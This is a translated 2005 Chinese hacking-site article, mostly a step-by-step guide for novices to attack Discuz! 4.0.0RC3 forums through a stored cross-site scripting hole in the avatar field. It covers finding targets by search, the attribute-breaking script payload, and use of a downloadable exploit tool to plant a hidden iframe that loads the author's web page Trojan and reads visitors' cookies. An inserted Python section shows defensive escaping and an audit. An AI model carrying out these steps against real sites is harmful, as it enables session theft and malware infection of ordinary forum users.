myhack58 · 佚名 (anonymous) · MYHACK58:6220053162
History: Oct 04, 2005 - 12:00 a.m.

Discuz! forum intrusion: a vulnerability warning from the Black Bar Safety Net


Recently a wave of intrusions into Discuz! forums, started by novices with time on their hands, has kept the whole security community in an uproar. The webmasters reacted quickly, though: the low versions of Discuz! did not stay around for long and were replaced by a higher version (Discuz! 4.0.0RC3) to close the hole. After testing, however, the author found that this newer Discuz! version still contains a cross-site scripting vulnerability; only the method differs somewhat. Below is the author's record of this round of research, so let us look together at the "thrill" the intrusion brings!

**One, the long-awaited "manual" intrusion method**

  1. First go to Google or Baidu and search for the keyword Powered by Discuz! 4.0.0RC3, then click the search button. You will find countless forums running this version; here the author picks a game company's site as the example. Enter the game company's site and click the "Register" tab in the upper right corner. The member agreement pops up; wait the reading time set by the forum, then click the "Agree" button below it. Fill in the required registration information and finally click "Submit", and the user is registered.

  2. After registration succeeds you are redirected to the forum home page. Go to "Control Panel" → "Edit personal information". Open the "Edit Profile" tab and click the "Forum avatar list" button below it, as shown in Figure 1; it displays all of the forum's avatar pictures. Here the author chooses any default avatar picture and saves the page to the local machine.

Figure 1: The forum avatar list

  3. Open the saved page in Notepad on the local machine, click the "Edit" menu at the top and choose "Find" to bring up the Find dialog. Enter `<FORM action=` in the search box and click "Find Next"; Notepad highlights the match in the content below, as shown in Figure 2. After the equals sign, prepend WWW.GU**NY.COM.CN so that the form's submit URL becomes a full path. Save the modified page, reopen it and click the "Submit" button. Then go back to the site's "Control Panel Home" tab and check whether the picture was submitted successfully.

Figure 2: The page code

Tip: because the avatar page was saved locally, the form's submit address is a relative path, so the site's URL has to be added to it. Otherwise submitting the page shows a 404 "path not found" error. If, after the URL has been filled in, the picture can be submitted to the site from the local copy, we can boldly say that the site has the avatar cross-site scripting vulnerability, and the next step, the cross-site intrusion, can be carried out.

  4. After the picture has been submitted successfully, open the locally submitted page in the DreamWeaver web design software, click one of the avatar radio buttons and change its selected value to the string `images/avatars/02.gif"><script>alert("qujing reminder: your site contains the avatar cross-site scripting vulnerability, please take appropriate defensive measures!")</script>"`. Click the "File" menu and choose "Save"; the modified control is saved. Then double-click to open the page, select that avatar radio button and click the "Submit" button. The program replies "modified successfully!", and when the page is refreshed the warning dialog built by the author pops up, as shown in Figure 3. Finally, reply in a popular post: whenever a user opens a page containing the author's post, the warning dialog shown in Figure 3 pops up.

Figure 3: The warning dialog

Small tip: look at the page source of the "Control Panel Home" tab. Anyone paying a little attention will find the picture's address in the call `<img src="www.gu**y.com.cn/images/avatars/02.gif" width="83" height="94" border="0">`. The code that generates it is `<img src="$avatars"`, so we can construct a radio-control value to modify the selected value. DreamWeaver or another web authoring tool is needed for the modification, so that the format is escaped automatically; do not use Notepad to modify the relevant values, or the whole content will be scrambled.
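The root cause described in the tip is that the stored avatar value is placed into the `src` attribute verbatim. The following Python script is an added illustration written for this page, not Discuz! code (Discuz! is PHP; Python is used here only because the lesson is language-independent). It reproduces the unescaped `<img src="$avatars">` pattern quoted above beside a hardened version that allowlists the avatar path and escapes the attribute, and it includes a small audit over constructed stored values. The function names, the allowlist rule and the sample rows are assumptions made for this example; the payload string is the one quoted in the article.

```python
"""Unescaped avatar rendering (as the article describes) beside a hardened version.

Added illustration, not Discuz! code. Only the <img src="$avatars"> pattern and the
payload come from the article; names, policy and sample data are assumed here.
"""
import html
import re

# Avatar value the article's attacker submits by editing the radio control
# (constructed from the payload quoted in the article).
ARTICLE_PAYLOAD = 'images/avatars/02.gif"><script>alert("qujing reminder")</script>'

# Assumed policy: only default avatars under images/avatars/ with a plain file name.
AVATAR_RE = re.compile(r"images/avatars/[A-Za-z0-9_-]+\.(gif|jpg|png)")


def render_avatar_unsafe(avatar: str) -> str:
    """Mirrors the article's <img src="$avatars"> call: the value lands in the attribute verbatim."""
    return f'<img src="{avatar}" width="83" height="94" border="0">'


def is_valid_avatar(avatar: str) -> bool:
    """Server-side allowlist check: accept only a plain default-avatar path."""
    return AVATAR_RE.fullmatch(avatar) is not None


def render_avatar_safe(avatar: str, fallback: str = "images/avatars/01.gif") -> str:
    """Validate, fall back to a known default on failure, and escape the attribute anyway."""
    if not is_valid_avatar(avatar):
        avatar = fallback
    # html.escape with quote=True turns " into &quot; and < into &lt;, so even a value that
    # slipped past validation could not close the attribute or open a new tag.
    return f'<img src="{html.escape(avatar, quote=True)}" width="83" height="94" border="0">'


def contains_script_tag(rendered: str) -> bool:
    """Detection helper: True if rendered markup contains an injected <script> element."""
    return "<script" in rendered.lower()


def audit_stored_avatars(rows):
    """Scan stored (user_id, avatar) rows and return the ids whose value fails the allowlist."""
    return [uid for uid, avatar in rows if not is_valid_avatar(avatar)]


if __name__ == "__main__":
    # Constructed sample rows: one legitimate avatar, the article's payload, a traversal attempt.
    sample_rows = [
        (1, "images/avatars/02.gif"),
        (2, ARTICLE_PAYLOAD),
        (3, "../../etc/passwd"),
    ]
    print("unsafe :", render_avatar_unsafe(ARTICLE_PAYLOAD))
    print("safe   :", render_avatar_safe(ARTICLE_PAYLOAD))
    print("suspect user ids:", audit_stored_avatars(sample_rows))
```

The audit function is the check a forum administrator would run over the stored avatar column after reading a warning like the one in this article: any value that is not a plain path under the avatar directory is a sign that the profile form was submitted with a tampered value.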

**Second, a worker who wants to do good work must first sharpen his tools**

Perhaps the tedious manual intrusion method is not suited to newbies. No matter: the author has again tailored a "fool-proof" intrusion package for all the newcomers. Its purpose is to let friends with no background at all follow the method described below and intrude on the premium version of the Discuz! forum.

Prerequisite: first download the Discuz! 4.0.0RC3 exploit tool from http://blog.blackwoods.cn/up/DiscuzExploit.exe. Friends with slow downloads need not worry: the software is also included on this issue's companion disc, so readers please take note.

Step 1. Double-click the "exploit tool" icon downloaded to the desktop to bring up the program interface shown in Figure 4, then in the text box for the second step manually type the address where the cross-site attack succeeded, www.gu**y.com.cn/. When that is done, click the "Read parameters" button below and wait a moment; the "read successful" dialog shown in Figure 5 appears. Click the "OK" button.

Figure 4: The exploit tool

Figure 5: Reading the parameters

Tip: the manual intrusion and the tool intrusion use the same site as the example. So for the first step prompted in the tool's interface, registering a site user, the author already registered during the manual intrusion and has the login cookies saved, and skips it here to avoid repeating the explanation. If you are not yet a registered user of the vulnerable site, please register a user first and then follow the method in Step 1.

Step 2. In the third step, the cross-site content box, enter the malicious code to insert. If at this point you know nothing about code, you can refer to the three buttons on the code assistant tab on the left, as shown in Figure 6. Here the author clicks the "Insert an IFrame" button, and the code `<iframe src="" width=0 height=0></iframe>` appears in the cross-site content box. After `<iframe src=`, fill in the URL www.fa***d.com\fda.asp, which is the address of a web page backdoor the author prepared beforehand.

Figure 6: The code assistant

Small tip: the code assistant's "Pop-up dialog" button, "Read COOKIES" button and "Insert IFrame" button stand for what happens when a user browses a page containing your post: 1. the warning dialog shown in Figure 3 pops up; 2. the browsing user's cookie information is captured; 3. the site's Trojan is loaded on the user's machine.

Step 3. With the input complete, leave the other settings at their defaults and click the "Submit" button. The execution progress box shows the whole process of writing the code to the site, as shown in Figure 7. Success, however, is only confirmed by the success message at the end; here the author waits about ten seconds before the success "conclusion" pops up, as in Figure 8. Once the malicious address has been written successfully, post in the exploited forum under a tempting, eye-catching title; any user who views the post may be hit by the web page Trojan the author set up.

Figure 7: Execution progress

Figure 8: The success message

**Third, summary**

Although the avatar cross-site scripting vulnerability in Discuz! 4.0.0RC3 does not endanger the security of the whole forum, it does affect the computer safety of the forum's users. At the least it can lead to important information being stolen; at worst the computer suddenly becomes a "broiler" (a zombie machine)!

Note: the content of this article is only meant to show everyone this technique; no one may use it to do illegal things.